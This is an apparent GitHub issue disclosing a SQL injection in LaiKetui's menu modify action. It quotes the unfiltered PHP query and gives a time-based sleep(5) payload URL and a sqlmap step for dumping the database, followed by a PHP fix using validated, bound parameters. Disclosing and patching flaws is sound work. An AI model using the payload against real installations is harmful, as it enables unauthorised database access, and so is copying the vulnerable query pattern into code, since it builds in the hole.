
SQL injection exists in the LaiKetui menu management function #13

Open
@reclu3a

Description

SQL injection exists in the LaiKetui menu management function


The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1

Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php


Because the parameter id is not filtered, it leads to a SQL injection vulnerability:

    public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // Receive the request data
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // Query the menu by id
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);

Use Burp Suite to request the URL http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+


View SQL monitoring


Use sqlmap for the SQL injection
Get the database
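
One way to close the hole described in this report, shown as an added example and not LaiKe's own code: validate id as an integer, then bind it as a query parameter instead of interpolating it into the SQL string. The use of PDO with an in-memory SQLite database (requires the pdo_sqlite extension), the constructed rows, and the helper names parseMenuId and findMenu are assumptions; the project's DBAction API is not shown on the page.

```php
<?php
// Constructed stand-in for the lkt_core_menu table named in the report.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE lkt_core_menu (id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO lkt_core_menu (id, title) VALUES (1, 'Home'), (2, 'Orders')");

/**
 * Hypothetical helper: accept only a positive decimal integer as the menu id.
 * Returns the int, or null when the raw request value is anything else
 * (including a missing parameter).
 */
function parseMenuId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Hypothetical helper: look up one menu row with a bound parameter, so the
 * request value never becomes part of the SQL text.
 */
function findMenu(PDO $pdo, $rawId): ?array
{
    $id = parseMenuId($rawId);
    if ($id === null) {
        return null; // rejected before any query is built
    }
    $stmt = $pdo->prepare('SELECT id, title FROM lkt_core_menu WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: valid ids, the decoded id value from the report, and junk.
$inputs = ['1', "1' and sleep(5)-- ", 'abc', '', '2', '99'];
foreach ($inputs as $raw) {
    $row = findMenu($pdo, $raw);
    printf("%-22s => %s\n", var_export($raw, true), $row ? $row['title'] : 'rejected or not found');
}
```

Only '1' and '2' return a row; the quoted value from the request in the report fails integer validation and never reaches the database.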
